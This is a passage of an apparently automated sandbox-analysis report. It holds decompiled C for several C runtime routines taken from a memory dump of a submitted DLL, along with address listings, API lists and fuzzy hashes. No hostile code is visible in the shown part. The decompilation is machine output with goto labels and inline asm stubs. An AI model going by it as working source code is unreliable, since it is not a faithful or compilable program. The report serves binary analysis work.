                                                                                        				_t181 = _a24;
                                                                                        				if(_t181 < 0) {
                                                                                        					_t181 = 0;
                                                                                        				}
                                                                                        				_t184 = _a8;
                                                                                        				 *_t184 = 0;
                                                                                        				E10006937(0,  &_v52, _t171, _a36);
                                                                                        				_t5 = _t181 + 0xb; // 0xb
                                                                                        				if(_a12 > _t5) {
                                                                                        					_t172 = _a4;
                                                                                        					_t142 = _t172[1];
                                                                                        					_v36 =  *_t172;
                                                                                        					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                        					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                                        						L11:
                                                                                        						__eflags = _t142 & 0x80000000;
                                                                                        						if((_t142 & 0x80000000) != 0) {
                                                                                        							 *_t184 = 0x2d;
                                                                                        							_t184 = _t184 + 1;
                                                                                        							__eflags = _t184;
                                                                                        						}
                                                                                        						__eflags = _a28;
                                                                                        						_v16 = 0x3ff;
                                                                                        						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                                        						__eflags = _t172[1] & 0x7ff00000;
                                                                                        						_v32 = _t136;
                                                                                        						_t86 = 0x30;
                                                                                        						if((_t172[1] & 0x7ff00000) != 0) {
                                                                                        							 *_t184 = 0x31;
                                                                                        							_t185 = _t184 + 1;
                                                                                        							__eflags = _t185;
                                                                                        						} else {
                                                                                        							 *_t184 = _t86;
                                                                                        							_t185 = _t184 + 1;
                                                                                        							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                                        							__eflags = _t164;
                                                                                        							if(_t164 != 0) {
                                                                                        								_v16 = 0x3fe;
                                                                                        							} else {
                                                                                        								_v16 = _v16 & _t164;
                                                                                        							}
                                                                                        						}
                                                                                        						_t146 = _t185;
                                                                                        						_t186 = _t185 + 1;
                                                                                        						_v28 = _t146;
                                                                                        						__eflags = _t181;
                                                                                        						if(_t181 != 0) {
                                                                                        							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                                                                                        						} else {
                                                                                        							 *_t146 = 0;
                                                                                        						}
                                                                                        						_t92 = _t172[1] & 0x000fffff;
                                                                                        						__eflags = _t92;
                                                                                        						_v20 = _t92;
                                                                                        						if(_t92 > 0) {
                                                                                        							L23:
                                                                                        							_t33 =  &_v8;
                                                                                        							 *_t33 = _v8 & 0x00000000;
                                                                                        							__eflags =  *_t33;
                                                                                        							_t147 = 0xf0000;
                                                                                        							_t93 = 0x30;
                                                                                        							_v12 = _t93;
                                                                                        							_v20 = 0xf0000;
                                                                                        							do {
                                                                                        								__eflags = _t181;
                                                                                        								if(_t181 <= 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t119 = E10012630( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                        								_t161 = 0x30;
                                                                                        								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                                        								__eflags = _t121 - 0x39;
                                                                                        								if(_t121 > 0x39) {
                                                                                        									_t121 = _t121 + _t136;
                                                                                        									__eflags = _t121;
                                                                                        								}
                                                                                        								_t162 = _v20;
                                                                                        								_t172 = _a4;
                                                                                        								 *_t186 = _t121;
                                                                                        								_t186 = _t186 + 1;
                                                                                        								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                                        								_t147 = _t162 >> 4;
                                                                                        								_t93 = _v12 - 4;
                                                                                        								_t181 = _t181 - 1;
                                                                                        								_v20 = _t162 >> 4;
                                                                                        								_v12 = _t93;
                                                                                        								__eflags = _t93;
                                                                                        							} while (_t93 >= 0);
                                                                                        							__eflags = _t93;
                                                                                        							if(_t93 < 0) {
                                                                                        								goto L39;
                                                                                        							}
                                                                                        							_t115 = E10012630( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                        							__eflags = _t115 - 8;
                                                                                        							if(_t115 <= 8) {
                                                                                        								goto L39;
                                                                                        							}
                                                                                        							_t54 = _t186 - 1; // 0x100070b8
                                                                                        							_t116 = _t54;
                                                                                        							_t138 = 0x30;
                                                                                        							while(1) {
                                                                                        								_t156 =  *_t116;
                                                                                        								__eflags = _t156 - 0x66;
                                                                                        								if(_t156 == 0x66) {
                                                                                        									goto L33;
                                                                                        								}
                                                                                        								__eflags = _t156 - 0x46;
                                                                                        								if(_t156 != 0x46) {
                                                                                        									_t139 = _v32;
                                                                                        									__eflags = _t116 - _v28;
                                                                                        									if(_t116 == _v28) {
                                                                                        										_t57 = _t116 - 1;
                                                                                        										 *_t57 =  *(_t116 - 1) + 1;
                                                                                        										__eflags =  *_t57;
                                                                                        									} else {
                                                                                        										_t157 =  *_t116;
                                                                                        										__eflags = _t157 - 0x39;
                                                                                        										if(_t157 != 0x39) {
                                                                                        											 *_t116 = _t157 + 1;
                                                                                        										} else {
                                                                                        											 *_t116 = _t139 + 0x3a;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L39;
                                                                                        								}
                                                                                        								L33:
                                                                                        								 *_t116 = _t138;
                                                                                        								_t116 = _t116 - 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							__eflags =  *_t172;
                                                                                        							if( *_t172 <= 0) {
                                                                                        								L39:
                                                                                        								__eflags = _t181;
                                                                                        								if(_t181 > 0) {
                                                                                        									_push(_t181);
                                                                                        									_t111 = 0x30;
                                                                                        									_push(_t111);
                                                                                        									_push(_t186);
                                                                                        									E10003E50(_t181);
                                                                                        									_t186 = _t186 + _t181;
                                                                                        									__eflags = _t186;
                                                                                        								}
                                                                                        								_t94 = _v28;
                                                                                        								__eflags =  *_t94;
                                                                                        								if( *_t94 == 0) {
                                                                                        									_t186 = _t94;
                                                                                        								}
                                                                                        								__eflags = _a28;
                                                                                        								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                        								_t174 = _a4[1];
                                                                                        								_t100 = E10012630( *_a4, 0x34, _t174);
                                                                                        								_t137 = 0;
                                                                                        								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                                        								__eflags = _t151;
                                                                                        								asm("sbb ebx, ebx");
                                                                                        								if(__eflags < 0) {
                                                                                        									L47:
                                                                                        									 *(_t186 + 1) = 0x2d;
                                                                                        									_t187 = _t186 + 2;
                                                                                        									__eflags = _t187;
                                                                                        									_t151 =  ~_t151;
                                                                                        									asm("adc ebx, 0x0");
                                                                                        									_t137 =  ~_t137;
                                                                                        									goto L48;
                                                                                        								} else {
                                                                                        									if(__eflags > 0) {
                                                                                        										L46:
                                                                                        										 *(_t186 + 1) = 0x2b;
                                                                                        										_t187 = _t186 + 2;
                                                                                        										L48:
                                                                                        										_t182 = _t187;
                                                                                        										_t101 = 0x30;
                                                                                        										 *_t187 = _t101;
                                                                                        										__eflags = _t137;
                                                                                        										if(__eflags < 0) {
                                                                                        											L56:
                                                                                        											__eflags = _t187 - _t182;
                                                                                        											if(_t187 != _t182) {
                                                                                        												L60:
                                                                                        												_push(0);
                                                                                        												_push(0xa);
                                                                                        												_push(_t137);
                                                                                        												_push(_t151);
                                                                                        												_t102 = E10012550();
                                                                                        												_v32 = _t174;
                                                                                        												 *_t187 = _t102 + 0x30;
                                                                                        												_t187 = _t187 + 1;
                                                                                        												__eflags = _t187;
                                                                                        												L61:
                                                                                        												_t104 = 0x30;
                                                                                        												_t183 = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *_t187 = _t151 + _t104;
                                                                                        												 *(_t187 + 1) = 0;
                                                                                        												goto L62;
                                                                                        											}
                                                                                        											__eflags = _t137;
                                                                                        											if(__eflags < 0) {
                                                                                        												goto L61;
                                                                                        											}
                                                                                        											if(__eflags > 0) {
                                                                                        												goto L60;
                                                                                        											}
                                                                                        											__eflags = _t151 - 0xa;
                                                                                        											if(_t151 < 0xa) {
                                                                                        												goto L61;
                                                                                        											}
                                                                                        											goto L60;
                                                                                        										}
                                                                                        										if(__eflags > 0) {
                                                                                        											L51:
                                                                                        											_push(0);
                                                                                        											_push(0x3e8);
                                                                                        											_push(_t137);
                                                                                        											_push(_t151);
                                                                                        											_t107 = E10012550();
                                                                                        											_v32 = _t174;
                                                                                        											 *_t187 = _t107 + 0x30;
                                                                                        											_t187 = _t187 + 1;
                                                                                        											__eflags = _t187 - _t182;
                                                                                        											if(_t187 != _t182) {
                                                                                        												L55:
                                                                                        												_push(0);
                                                                                        												_push(0x64);
                                                                                        												_push(_t137);
                                                                                        												_push(_t151);
                                                                                        												_t109 = E10012550();
                                                                                        												_v32 = _t174;
                                                                                        												 *_t187 = _t109 + 0x30;
                                                                                        												_t187 = _t187 + 1;
                                                                                        												__eflags = _t187;
                                                                                        												goto L56;
                                                                                        											}
                                                                                        											L52:
                                                                                        											__eflags = _t137;
                                                                                        											if(__eflags < 0) {
                                                                                        												goto L56;
                                                                                        											}
                                                                                        											if(__eflags > 0) {
                                                                                        												goto L55;
                                                                                        											}
                                                                                        											__eflags = _t151 - 0x64;
                                                                                        											if(_t151 < 0x64) {
                                                                                        												goto L56;
                                                                                        											}
                                                                                        											goto L55;
                                                                                        										}
                                                                                        										__eflags = _t151 - 0x3e8;
                                                                                        										if(_t151 < 0x3e8) {
                                                                                        											goto L52;
                                                                                        										}
                                                                                        										goto L51;
                                                                                        									}
                                                                                        									__eflags = _t151;
                                                                                        									if(_t151 < 0) {
                                                                                        										goto L47;
                                                                                        									}
                                                                                        									goto L46;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L23;
                                                                                        						}
                                                                                        					}
                                                                                        					__eflags = 0;
                                                                                        					if(0 != 0) {
                                                                                        						goto L11;
                                                                                        					} else {
                                                                                        						_t183 = E10009F92(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                                        						__eflags = _t183;
                                                                                        						if(_t183 == 0) {
                                                                                        							_t128 = E10012790(_t184, 0x65);
                                                                                        							_pop(_t166);
                                                                                        							__eflags = _t128;
                                                                                        							if(_t128 != 0) {
                                                                                        								__eflags = _a28;
                                                                                        								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                        								__eflags = _t170;
                                                                                        								 *_t128 = _t170;
                                                                                        								 *((char*)(_t128 + 3)) = 0;
                                                                                        							}
                                                                                        							_t183 = 0;
                                                                                        						} else {
                                                                                        							 *_t184 = 0;
                                                                                        						}
                                                                                        						goto L62;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t129 = E100097FE();
                                                                                        					_t183 = 0x22;
                                                                                        					 *_t129 = _t183;
                                                                                        					E100061CF();
                                                                                        					L62:
                                                                                        					if(_v40 != 0) {
                                                                                        						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                                        					}
                                                                                        					return _t183;
                                                                                        				}
                                                                                        			}
























































                                                                                        0x10009c8f
                                                                                        0x10009c9a
                                                                                        0x10009ca1
                                                                                        0x10009ca3
                                                                                        0x10009ca3
                                                                                        0x10009ca5
                                                                                        0x10009cae
                                                                                        0x10009cb0
                                                                                        0x10009cb5
                                                                                        0x10009cbb
                                                                                        0x10009cd1
                                                                                        0x10009cd6
                                                                                        0x10009cd9
                                                                                        0x10009ce6
                                                                                        0x10009ceb
                                                                                        0x10009d3f
                                                                                        0x10009d47
                                                                                        0x10009d49
                                                                                        0x10009d4b
                                                                                        0x10009d4e
                                                                                        0x10009d4e
                                                                                        0x10009d4e
                                                                                        0x10009d54
                                                                                        0x10009d5c
                                                                                        0x10009d6f
                                                                                        0x10009d72
                                                                                        0x10009d74
                                                                                        0x10009d77
                                                                                        0x10009d78
                                                                                        0x10009d99
                                                                                        0x10009d9c
                                                                                        0x10009d9c
                                                                                        0x10009d7a
                                                                                        0x10009d7a
                                                                                        0x10009d7c
                                                                                        0x10009d87
                                                                                        0x10009d87
                                                                                        0x10009d89
                                                                                        0x10009d90
                                                                                        0x10009d8b
                                                                                        0x10009d8b
                                                                                        0x10009d8b
                                                                                        0x10009d89
                                                                                        0x10009d9d
                                                                                        0x10009d9f
                                                                                        0x10009da0
                                                                                        0x10009da3
                                                                                        0x10009da5
                                                                                        0x10009db9
                                                                                        0x10009da7
                                                                                        0x10009da7
                                                                                        0x10009da7
                                                                                        0x10009dbe
                                                                                        0x10009dbe
                                                                                        0x10009dc3
                                                                                        0x10009dc6
                                                                                        0x10009dd1
                                                                                        0x10009dd1
                                                                                        0x10009dd1
                                                                                        0x10009dd1
                                                                                        0x10009dd5
                                                                                        0x10009ddc
                                                                                        0x10009ddd
                                                                                        0x10009de0
                                                                                        0x10009de3
                                                                                        0x10009de3
                                                                                        0x10009de5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009dfd
                                                                                        0x10009e04
                                                                                        0x10009e08
                                                                                        0x10009e0b
                                                                                        0x10009e0e
                                                                                        0x10009e10
                                                                                        0x10009e10
                                                                                        0x10009e10
                                                                                        0x10009e12
                                                                                        0x10009e15
                                                                                        0x10009e18
                                                                                        0x10009e1a
                                                                                        0x10009e22
                                                                                        0x10009e28
                                                                                        0x10009e2b
                                                                                        0x10009e2e
                                                                                        0x10009e2f
                                                                                        0x10009e32
                                                                                        0x10009e35
                                                                                        0x10009e35
                                                                                        0x10009e3a
                                                                                        0x10009e3d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009e55
                                                                                        0x10009e5a
                                                                                        0x10009e5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009e62
                                                                                        0x10009e62
                                                                                        0x10009e65
                                                                                        0x10009e66
                                                                                        0x10009e66
                                                                                        0x10009e68
                                                                                        0x10009e6b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009e6d
                                                                                        0x10009e70
                                                                                        0x10009e77
                                                                                        0x10009e7a
                                                                                        0x10009e7d
                                                                                        0x10009e93
                                                                                        0x10009e93
                                                                                        0x10009e93
                                                                                        0x10009e7f
                                                                                        0x10009e7f
                                                                                        0x10009e81
                                                                                        0x10009e84
                                                                                        0x10009e8f
                                                                                        0x10009e86
                                                                                        0x10009e89
                                                                                        0x10009e89
                                                                                        0x10009e84
                                                                                        0x00000000
                                                                                        0x10009e7d
                                                                                        0x10009e72
                                                                                        0x10009e72
                                                                                        0x10009e74
                                                                                        0x10009e74
                                                                                        0x10009dc8
                                                                                        0x10009dc8
                                                                                        0x10009dcb
                                                                                        0x10009e96
                                                                                        0x10009e96
                                                                                        0x10009e98
                                                                                        0x10009e9a
                                                                                        0x10009e9d
                                                                                        0x10009e9e
                                                                                        0x10009e9f
                                                                                        0x10009ea0
                                                                                        0x10009ea8
                                                                                        0x10009ea8
                                                                                        0x10009ea8
                                                                                        0x10009eaa
                                                                                        0x10009ead
                                                                                        0x10009eb0
                                                                                        0x10009eb2
                                                                                        0x10009eb2
                                                                                        0x10009eb4
                                                                                        0x10009ec6
                                                                                        0x10009eca
                                                                                        0x10009ecd
                                                                                        0x10009ed4
                                                                                        0x10009edc
                                                                                        0x10009edc
                                                                                        0x10009edf
                                                                                        0x10009ee1
                                                                                        0x10009ef2
                                                                                        0x10009ef2
                                                                                        0x10009ef6
                                                                                        0x10009ef6
                                                                                        0x10009ef9
                                                                                        0x10009efb
                                                                                        0x10009efe
                                                                                        0x00000000
                                                                                        0x10009ee3
                                                                                        0x10009ee3
                                                                                        0x10009ee9
                                                                                        0x10009ee9
                                                                                        0x10009eed
                                                                                        0x10009f00
                                                                                        0x10009f00
                                                                                        0x10009f04
                                                                                        0x10009f05
                                                                                        0x10009f07
                                                                                        0x10009f09
                                                                                        0x10009f4a
                                                                                        0x10009f4a
                                                                                        0x10009f4c
                                                                                        0x10009f59
                                                                                        0x10009f59
                                                                                        0x10009f5b
                                                                                        0x10009f5d
                                                                                        0x10009f5e
                                                                                        0x10009f5f
                                                                                        0x10009f66
                                                                                        0x10009f69
                                                                                        0x10009f6b
                                                                                        0x10009f6b
                                                                                        0x10009f6c
                                                                                        0x10009f6e
                                                                                        0x10009f71
                                                                                        0x10009f71
                                                                                        0x10009f73
                                                                                        0x10009f75
                                                                                        0x00000000
                                                                                        0x10009f75
                                                                                        0x10009f4e
                                                                                        0x10009f50
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f52
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f54
                                                                                        0x10009f57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f57
                                                                                        0x10009f10
                                                                                        0x10009f16
                                                                                        0x10009f16
                                                                                        0x10009f18
                                                                                        0x10009f19
                                                                                        0x10009f1a
                                                                                        0x10009f1b
                                                                                        0x10009f22
                                                                                        0x10009f25
                                                                                        0x10009f27
                                                                                        0x10009f28
                                                                                        0x10009f2a
                                                                                        0x10009f37
                                                                                        0x10009f37
                                                                                        0x10009f39
                                                                                        0x10009f3b
                                                                                        0x10009f3c
                                                                                        0x10009f3d
                                                                                        0x10009f44
                                                                                        0x10009f47
                                                                                        0x10009f49
                                                                                        0x10009f49
                                                                                        0x00000000
                                                                                        0x10009f49
                                                                                        0x10009f2c
                                                                                        0x10009f2c
                                                                                        0x10009f2e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f32
                                                                                        0x10009f35
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f35
                                                                                        0x10009f12
                                                                                        0x10009f14
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009f14
                                                                                        0x10009ee5
                                                                                        0x10009ee7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009ee7
                                                                                        0x10009ee1
                                                                                        0x00000000
                                                                                        0x10009dcb
                                                                                        0x10009dc6
                                                                                        0x10009ced
                                                                                        0x10009cef
                                                                                        0x00000000
                                                                                        0x10009cf1
                                                                                        0x10009d07
                                                                                        0x10009d0c
                                                                                        0x10009d0e
                                                                                        0x10009d1a
                                                                                        0x10009d20
                                                                                        0x10009d21
                                                                                        0x10009d23
                                                                                        0x10009d25
                                                                                        0x10009d30
                                                                                        0x10009d30
                                                                                        0x10009d33
                                                                                        0x10009d35
                                                                                        0x10009d35
                                                                                        0x10009d38
                                                                                        0x10009d10
                                                                                        0x10009d10
                                                                                        0x10009d10
                                                                                        0x00000000
                                                                                        0x10009d0e
                                                                                        0x10009cbd
                                                                                        0x10009cbd
                                                                                        0x10009cc4
                                                                                        0x10009cc5
                                                                                        0x10009cc7
                                                                                        0x10009f79
                                                                                        0x10009f7d
                                                                                        0x10009f82
                                                                                        0x10009f82
                                                                                        0x10009f91
                                                                                        0x10009f91

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1036877536-0
                                                                                        • Opcode ID: d6336a791f688052c155b24843f9143c5aa41aebfc042e85019e5348c814df92
                                                                                        • Instruction ID: f2e7e67daea27717e3cd2ae2d58e0b03ca0753b831fa4d573143ba3965ebbb9f
                                                                                        • Opcode Fuzzy Hash: d6336a791f688052c155b24843f9143c5aa41aebfc042e85019e5348c814df92
                                                                                        • Instruction Fuzzy Hash: 9BA15472A043869FF711CF68C8917AEBBE5EF553D0F1541BEE9849B285C2389D81C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 81%
                                                                                        			E1000E8C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                        				signed int _v8;
                                                                                        				int _v12;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v24;
                                                                                        				char _v28;
                                                                                        				void* _v40;
                                                                                        				signed int _t34;
                                                                                        				signed int _t40;
                                                                                        				int _t46;
                                                                                        				int _t53;
                                                                                        				void* _t55;
                                                                                        				int _t57;
                                                                                        				signed int _t63;
                                                                                        				int _t67;
                                                                                        				short* _t69;
                                                                                        				signed int _t70;
                                                                                        				short* _t71;
                                                                                        
                                                                                        				_t34 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t34 ^ _t70;
                                                                                        				E10006937(__ebx,  &_v28, __edx, _a4);
                                                                                        				_t57 = _a24;
                                                                                        				if(_t57 == 0) {
                                                                                        					_t6 = _v24 + 8; // 0xcce85006
                                                                                        					_t53 =  *_t6;
                                                                                        					_t57 = _t53;
                                                                                        					_a24 = _t53;
                                                                                        				}
                                                                                        				_t67 = 0;
                                                                                        				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                        				_v12 = _t40;
                                                                                        				if(_t40 == 0) {
                                                                                        					L15:
                                                                                        					if(_v16 != 0) {
                                                                                        						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                        					}
                                                                                        					return E1000296F(_v8 ^ _t70);
                                                                                        				}
                                                                                        				_t55 = _t40 + _t40;
                                                                                        				asm("sbb eax, eax");
                                                                                        				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                        					_t69 = 0;
                                                                                        					L11:
                                                                                        					if(_t69 != 0) {
                                                                                        						E10003E50(_t67, _t69, _t67, _t55);
                                                                                        						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                        						if(_t46 != 0) {
                                                                                        							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                        						}
                                                                                        					}
                                                                                        					L14:
                                                                                        					E1000CA23(_t69);
                                                                                        					goto L15;
                                                                                        				}
                                                                                        				asm("sbb eax, eax");
                                                                                        				_t48 = _t40 & _t55 + 0x00000008;
                                                                                        				_t63 = _t55 + 8;
                                                                                        				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t69 = E1000984B(_t63, _t48 & _t63);
                                                                                        					if(_t69 == 0) {
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					 *_t69 = 0xdddd;
                                                                                        					L9:
                                                                                        					_t69 =  &(_t69[4]);
                                                                                        					goto L11;
                                                                                        				}
                                                                                        				asm("sbb eax, eax");
                                                                                        				E10012650();
                                                                                        				_t69 = _t71;
                                                                                        				if(_t69 == 0) {
                                                                                        					goto L14;
                                                                                        				}
                                                                                        				 *_t69 = 0xcccc;
                                                                                        				goto L9;
                                                                                        			}




















                                                                                        0x1000e8cb
                                                                                        0x1000e8d2
                                                                                        0x1000e8de
                                                                                        0x1000e8e3
                                                                                        0x1000e8e8
                                                                                        0x1000e8ed
                                                                                        0x1000e8ed
                                                                                        0x1000e8f0
                                                                                        0x1000e8f2
                                                                                        0x1000e8f2
                                                                                        0x1000e8f7
                                                                                        0x1000e910
                                                                                        0x1000e916
                                                                                        0x1000e91b
                                                                                        0x1000e9ba
                                                                                        0x1000e9be
                                                                                        0x1000e9c3
                                                                                        0x1000e9c3
                                                                                        0x1000e9df
                                                                                        0x1000e9df
                                                                                        0x1000e921
                                                                                        0x1000e929
                                                                                        0x1000e92d
                                                                                        0x1000e979
                                                                                        0x1000e97b
                                                                                        0x1000e97d
                                                                                        0x1000e982
                                                                                        0x1000e999
                                                                                        0x1000e9a1
                                                                                        0x1000e9b1
                                                                                        0x1000e9b1
                                                                                        0x1000e9a1
                                                                                        0x1000e9b3
                                                                                        0x1000e9b4
                                                                                        0x00000000
                                                                                        0x1000e9b9
                                                                                        0x1000e934
                                                                                        0x1000e936
                                                                                        0x1000e938
                                                                                        0x1000e940
                                                                                        0x1000e95d
                                                                                        0x1000e967
                                                                                        0x1000e96c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000e96e
                                                                                        0x1000e974
                                                                                        0x1000e974
                                                                                        0x00000000
                                                                                        0x1000e974
                                                                                        0x1000e944
                                                                                        0x1000e948
                                                                                        0x1000e94d
                                                                                        0x1000e951
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000e953
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,CCE85006,10006ACC,00000000,00000000,1000742A,00000001,1000742A,?,00000001,10006ACC,CCE85006,00000001,1000742A,1000742A), ref: 1000E910
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000E999
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000E9AB
                                                                                        • __freea.LIBCMT ref: 1000E9B4
                                                                                          • Part of subcall function 1000984B: HeapAlloc.KERNEL32(00000000,10002953,?,?,10003B25,?,?,00000000,00000000,?,100028A6,10002953,?,?,?,?), ref: 1000987D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 573072132-0
                                                                                        • Opcode ID: 761d08b5707227e6366c9f95017bd4bf86bc9e59b0af9a4271643387ad06fcd0
                                                                                        • Instruction ID: d9f72a91e93388924fa51e03b87187d72c5d8e4e6961e6f8257e651a6ad130da
                                                                                        • Opcode Fuzzy Hash: 761d08b5707227e6366c9f95017bd4bf86bc9e59b0af9a4271643387ad06fcd0
                                                                                        • Instruction Fuzzy Hash: 9F31AD72A0025AABEF15CF64DC81EAE7BA5EB44790F118128FC04E7294EB35DD54CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 47%
                                                                                        			E100042C2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				intOrPtr _t18;
                                                                                        				void* _t24;
                                                                                        				intOrPtr _t26;
                                                                                        				void* _t27;
                                                                                        				void* _t28;
                                                                                        				intOrPtr _t29;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_t28 = __edx;
                                                                                        				_t26 = _a24;
                                                                                        				_t29 = _a8;
                                                                                        				if(_a28 != 0) {
                                                                                        					_push(_a28);
                                                                                        					_push(_t26);
                                                                                        					_push(_t29);
                                                                                        					_push(_a4);
                                                                                        					E10004229();
                                                                                        					_t31 = _t31 + 0x10;
                                                                                        				}
                                                                                        				_t18 = _a40;
                                                                                        				_t34 = _t18;
                                                                                        				if(_t18 == 0) {
                                                                                        					_t18 = _t29;
                                                                                        				}
                                                                                        				E100037FE(_t27, _t18, _a4);
                                                                                        				_t30 = _a32;
                                                                                        				E10004C23(_t26, _t27, _t28, _t29, _t34, _t29, _a16, _a20,  *_a32);
                                                                                        				E10005388(_t29, _a20,  *((intOrPtr*)(_t30 + 4)) + 1);
                                                                                        				_push(0x100);
                                                                                        				_push(_a36);
                                                                                        				_push( *((intOrPtr*)(_t26 + 0xc)));
                                                                                        				_push(_a20);
                                                                                        				_push(_a12);
                                                                                        				_push(_t29);
                                                                                        				_push(_a4);
                                                                                        				_t24 = E100049C3(_t28, _t30, _t34);
                                                                                        				if(_t24 != 0) {
                                                                                        					E100037CE(_t24, _t29);
                                                                                        					return _t24;
                                                                                        				}
                                                                                        				return _t24;
                                                                                        			}














                                                                                        0x100042c2
                                                                                        0x100042ca
                                                                                        0x100042cf
                                                                                        0x100042d2
                                                                                        0x100042d4
                                                                                        0x100042d7
                                                                                        0x100042d8
                                                                                        0x100042d9
                                                                                        0x100042dc
                                                                                        0x100042e1
                                                                                        0x100042e1
                                                                                        0x100042e4
                                                                                        0x100042e7
                                                                                        0x100042e9
                                                                                        0x100042eb
                                                                                        0x100042eb
                                                                                        0x100042f1
                                                                                        0x100042f6
                                                                                        0x10004302
                                                                                        0x10004310
                                                                                        0x10004315
                                                                                        0x1000431a
                                                                                        0x1000431d
                                                                                        0x10004320
                                                                                        0x10004323
                                                                                        0x10004326
                                                                                        0x10004327
                                                                                        0x1000432a
